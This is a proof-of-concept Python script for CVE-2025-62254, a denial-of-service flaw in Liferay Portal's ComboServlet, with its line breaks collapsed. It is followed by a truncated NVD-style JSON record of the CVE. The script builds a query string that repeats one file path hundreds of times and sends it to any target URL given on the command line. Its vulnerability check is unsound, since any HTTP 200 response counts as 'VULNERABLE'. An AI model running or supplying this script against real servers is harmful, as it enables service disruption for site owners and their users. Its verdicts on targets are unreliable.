CVE-2025-62254

import requests import sys # CVE-2025-62254 PoC - Liferay ComboServlet DoS # Target: Liferay Portal/DXP ComboServlet endpoint def generate_dos_payload(num_files=1000): """Generate malicious query string with many file references""" base_path = '/o/frontend-js-legacy-web/portal/combo?' # Repeat file references to exhaust server resources files = ['/path/resource1.js'] * num_files return base_path + '&'.join([f'minifiedPath={file}' for file in files]) def check_vulnerability(target_url): """Check if target is vulnerable to CVE-2025-62254""" vulnerable = False try: # Send a request with multiple file references payload = generate_dos_payload(num_files=500) full_url = target_url.rstrip('/') + payload response = requests.get(full_url, timeout=30, allow_redirects=False) # Check if response is abnormally large (potential DoS condition) if len(response.content) > 1000000: # > 1MB response print(f'[+] Large response detected: {len(response.content)} bytes') vulnerable = True # Check for ComboServlet pattern in response if 'Liferay' in response.text or response.status_code == 200: print(f'[+] ComboServlet is accessible') vulnerable = True except requests.exceptions.Timeout: print('[+] Request timeout - possible DoS condition') vulnerable = True except Exception as e: print(f'[-] Error: {e}') return vulnerable if __name__ == '__main__': if len(sys.argv) < 2: print('Usage: python cve-2025-62254.py <target_url>') print('Example: python cve-2025-62254.py http://vulnerable-liferay:8080') sys.exit(1) target = sys.argv[1] print(f'[*] Checking CVE-2025-62254 on {target}') if check_vulnerability(target): print('[!] Target appears to be VULNERABLE') else: print('[*] Target may not be vulnerable')

{"cve": {"id": "CVE-2025-62254", "sourceIdentifier": "[email protected]", "published": "2025-10-23T23:15:37.700", "lastModified": "2025-11-10T22:14:11.877", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The ComboServlet in Liferay Portal 7.4.0 through 7.4.3.111, and older unsupported versions, and Liferay DXP 2023.Q4.0 through 2023.Q4.2, 2023.Q3.1 through 2023.Q3.5, 7.4 GA through update 92, 7.3 GA through update 35, and older unsupported versions does not limit the number or size of the files it will combine, which allows remote attackers to create very large responses that lead to a denial of service attack via the URL query string."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:7.3:-:*:*:*:*:*:*", "matchCriteriaId": "6F6A98ED-E694-4F39-95D0-C152BD1EC115"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:7.3:fix_pack_1:*:*:*:*:*:*", "matchCriteriaId": "2CD6861A-D546-462F-8B22-FA76A4AF8A9C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:7.3:fix_pack_2:*:*:*:*:*:*", "matchCriteriaId": "324BB977-5AAC-4367-98FC-605FF4997B3F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:7.3:service_pack_1:*:*:*:*:*:*", "matchCriteriaId": "2BBA40AC-4619-434B-90CF-4D29A1CA6D86"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:7.3:service_pack_2:*:*:*:*:*:*", "matchCriteriaId": "135BED68-C2EC-4EE7-9138-91E0EE3608EB"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:7.3:service_pack_3:*:*:*:*:*:*", "matchCriteriaId": "728DF154-F19F-454C-87CA-1E755107F2A6"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:7.3:update1:*:*:*:*:*:*", "matchCriteriaId": "35F42314-AC3F-45B6-8BF8-49811E5F2FAB"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:7.3:update10:*:*:*:*:*:*", "matchCriteriaId": "AA984F92-4C6C-4049-A731-96F587B51E75"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:7.3:update11:*:*:*:*:*:*", "matchCriteriaId": "CADDF499-DDC4-4CEE-B512-404EA2024FCB"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:7.3:update12:*:*:*:*:*:*", "matchCriteriaId": "9EC64246-1039-4009-B9BD-7828FA0FA1C5"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:7.3:update13:*:*:*:*:*:*", "matchCriteriaId": "D9F352AE-AE22-4A84-94B6-6621D7E0BC59"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:7.3:update14:*:*:*:*:*:*", "matchCriteriaId": "3E84D881-6D47-48FD-B743-9D531F5F7D5C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digit ... (truncated)